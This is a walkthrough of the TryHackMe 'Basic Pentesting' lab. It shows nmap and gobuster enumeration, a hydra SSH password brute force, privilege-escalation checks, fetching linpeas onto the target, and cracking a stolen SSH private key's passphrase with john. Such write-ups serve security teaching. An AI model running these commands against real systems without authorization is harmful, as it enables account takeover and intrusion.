Basic Pen-testing (https://tryhackme.com/room/basicpentestingjt) is a room in TryHackMe designed to cover the basics of Web App Hacking and privilege escalation.
It's a part of the Complete Beginner learning path.
Fire up the machine, connect via openVPN and wait for your ip to show up. Mine was
Ping to ensure that the host is up and you can reach the host.
Start with an nmap scan. I did a simple scan to see that ports 22, 80, 139 and 445 were open and then did the proper scan only on these ports:
┌──(x117㉿kali)-[~] └─$ nmap -p 22,80,139,445 -sC -sV 10.10.90.250 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 00:56 IST Nmap scan report for 10.10.90.250 Host is up (0.24s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA) | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA) |_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h20m05s, deviation: 2h18m34s, median: 4s |_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: basic2 | NetBIOS computer name: BASIC2\x00 | Domain name: \x00 | FQDN: basic2 |_ System time: 2021-07-23T15:27:16-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-07-23T19:27:16 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.99 seconds
Port 80 is open so tried to visit the website running on that port. Checked for the robots.txt -> Not found. Checked the page source for interesting comments.
<!-- Check our dev note section if you need to know what to work on. -->
Tried to visit
http://10.10.90.250/dev but in vain. So it was time to run gobuster to bruteforce for directories and files of interest in the website.
┌──(x117㉿kali)-[~] └─$ gobuster dir -u http://10.10.90.250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,zip = =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.90.250 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: html,txt,zip,php [+] Timeout: 10s =============================================================== 2021/07/24 00:59:21 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 158] /development (Status: 301) [Size: 318] [--> http://10.10.90.250/development/] Progress: 60945 / 438325 (13.90%) ^C [!] Keyboard interrupt detected, terminating. =============================================================== 2021/07/24 01:18:20 Finished ===============================================================
Almost immediately we find
http://10.10.90.250/development/. On visiting the page, we see that we have access to two files :
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K 2018-04-22: SMB has been configured. -K 2018-04-21: I got Apache set up. Will put in our content later. -J
For J: I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP. -K
Doesn't help much, does it? Except for the fact that the name of one of the users 'may' start with j or k!
On enumerating with
enum4linux, we find the names of the users in question.
[+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\kay (Local User) S-1-22-1-1001 Unix User\jan (Local User)
Since ssh is open, we can try brute-forcing for their password using
┌──(x117㉿kali)-[~/Desktop/THM/BasicPentesting] └─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.249.144 ssh Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-24 13:30:51 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://10.10.249.144:22/ [STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344223 to do in 1320:50h, 16 active [STATUS] 117.67 tries/min, 353 tries in 00:03h, 14344051 to do in 2031:45h, 16 active [ssh] host: 10.10.249.144 login: jan password: <censored> 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 4 final worker threads did not complete until end. [ERROR] 4 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-24 13:37:47
Didn't get results for the user
kay, but got the password for user
jan. You can use any wordlist for the bruteforcing, but in CTFs or challenges like these, (which are intentionally made solvable, in order to help students!) it's always recommended to use common wordlists like
rockyou.txt. Most of the times words are deliberately picked from these wordlists. (Again, this is NOT AT ALL relevant for real world scenarios!)
The password for
jan turns out to be
So sshed as user jan(
ssh firstname.lastname@example.org) and started looking around in the file system. Did some basic manual enumeration :
- Logged in as kay.
- Very under-privileged user!!
- No interesting files(
- Checked /home(
- 2 users jan and kay
- Checked the files and directories of kay.(
ls -la /home/kay)
- Few interesting ones but with no read permissions
- Tried running
sudo -l: Can't run sudo
- Checked SUIDs(
find / -perm -u=s -type f 2>/dev/null). Nothing interesting
- Checked crontabs(
cat /etc/crontab). Nothing interesting
Time to call
linpeas.sh! I observed that I had no write permissions even inside jan's home directory. So changed directory to
/tmp, where I had permissions to create files.
I set up a simple http server on the port 8080 of my local machine and used wget to download linpeas.sh.
┌──(x117㉿kali)-[~/Desktop/THM/BasicPentesting] └─$ python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ...
<machine_ip> with the ip provided by THM when you connect via openVPN(Not your own machine's public ip))
You can also use the scp command to securely transfer files.
linpeas.sh on the system, to realise that /home/kay/.ssh/id_rsa had read permissions for all!
Copied the private key in the local system and tried logging in as kay. But it seemed to be passphrase protected.
john to crack the pass-phrase.
-$ /usr/share/john/ssh2john.py kay.id_rsa > kay.hash -$ john kay.hash
Used the key to login as
kay and read the file
┌──(x117㉿kali)-[~/Desktop/THM/BasicPentesting] └─$ ssh -i kay.id_rsa email@example.com 1 ⨯ load pubkey "kay.id_rsa": invalid format The authenticity of host '10.10.91.12 (10.10.91.12)' can't be established. ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.91.12' (ECDSA) to the list of known hosts. Enter passphrase for key 'kay.id_rsa': Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102 kay@basic2:~$ ls pass.bak kay@basic2:~$ cat pass.bak <censored>
That was it for the challenge!
Top comments (0)